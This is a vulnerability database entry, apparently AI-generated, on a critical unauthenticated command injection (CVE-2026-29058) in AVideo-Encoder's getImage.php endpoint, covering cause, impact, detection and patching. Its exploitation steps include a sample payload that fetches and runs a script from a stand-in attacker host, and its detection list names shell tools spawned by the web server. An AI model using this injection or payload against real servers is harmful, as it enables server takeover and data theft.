
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-29058 is a critical unauthenticated OS command injection vulnerability in AVideo-Encoder (also known as the AVideo platform) that allows remote attackers to execute arbitrary OS commands without any authentication. The flaw exists in objects/getImage.php and affects all versions prior to 7.0. It was published on March 6, 2026, with the patch released in version 7.0. It carries a CVSS v3.1 base score of 9.8 (Critical) (GitHub Advisory, Feedly).
The root cause (CWE-78) lies in objects/getImage.php, where the base64Url GET parameter is Base64-decoded and then interpolated directly into a double-quoted ffmpeg shell command without proper shell escaping (GitHub Advisory). The upstream validation uses PHP's FILTER_VALIDATE_URL, which checks URL syntax but does not strip shell metacharacters or command substitution sequences (e.g., $(...) or backticks), allowing them to be interpreted by the shell via shell_exec/nohup. Exploitation requires no authentication, no user interaction, and is achievable over the network with low complexity. A Metasploit module (avideo_encoder_getimage_cmd_injection.rb) targeting this endpoint has been publicly released (Metasploit).
Successful exploitation grants an unauthenticated attacker full OS-level command execution on the server running AVideo-Encoder, effectively resulting in complete server compromise. Attackers can exfiltrate sensitive data including configuration secrets, internal API keys, and credentials stored on the server, and can disrupt the video streaming service entirely. The high confidentiality, integrity, and availability impact means attackers can also use the compromised server as a pivot point for lateral movement within the internal network (GitHub Advisory, GBHackers).
A public Metasploit exploit module (exploits/linux/http/avideo_encoder_getimage_cmd_injection) was added to the Metasploit Framework on March 18, 2026, significantly lowering the barrier to exploitation (Metasploit, Rapid7 Blog). Additional proof-of-concept code is available via exploit-intel.com and Sploitus. The EPSS score is approximately 0.098% (low probability of exploitation in the next 30 days at time of scoring), and there is no confirmed evidence of active in-the-wild exploitation or CISA KEV listing as of the latest data (Feedly). No specific threat actor attribution has been reported.
objects/getImage.php, which is accessible without authentication.base64Url GET parameter contains a Base64-encoded string that, when decoded, includes a shell command substitution sequence (e.g., $(id) or $(curl attacker.com/shell.sh|bash)) embedded within a valid-looking URL to pass FILTER_VALIDATE_URL validation.https://target/objects/getImage.php?base64Url=<malicious_base64_value>. The server decodes the parameter and interpolates it into an ffmpeg shell command executed via shell_exec/nohup.www-data).curl/wget requests to attacker-controlled infrastructure); unusual DNS lookups originating from the web server process.objects/getImage.php with anomalous or unusually long base64Url parameter values containing encoded shell metacharacters ($, (, ), backticks); repeated requests to this endpoint from a single IP in a short timeframe..php files) in the AVideo-Encoder web root or upload directories; unexpected scripts or binaries in /tmp, /var/tmp, or world-writable directories; modified objects/getImage.php or objects/security.php.www-data spawning /bin/bash, curl, wget, python, nc, or nohup with suspicious arguments); unexpected ffmpeg invocations with non-standard arguments (GitHub Advisory, Metasploit).The primary remediation is to upgrade AVideo-Encoder to version 7.0 or later, which applies strict shell argument escaping (e.g., escapeshellarg()) to user-supplied values before building shell commands (GitHub Advisory). If immediate patching is not possible, restrict access to objects/getImage.php at the web server or reverse proxy layer using IP allowlists, authentication requirements, or by disabling the endpoint entirely. Additionally, deploy WAF rules to block suspicious patterns in the base64Url parameter, and implement network-level access controls to limit exposure of AVideo-Encoder instances to trusted networks only (Feedly).
The vulnerability received notable coverage from security news outlets including GBHackers, CyberSecurityNews, eSecurity Planet, and The Hacker News (in a weekly recap), with many describing it as a "zero-click" critical flaw enabling stream hijacking (GBHackers, CyberSecurityNews, eSecurity Planet). Rapid7 highlighted the vulnerability in their Metasploit weekly wrap-up blog post dated March 20, 2026, noting the addition of the exploit module (Rapid7 Blog). Social media discussion was active on Mastodon and Bluesky, with security researchers sharing advisories and PoC references shortly after disclosure.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."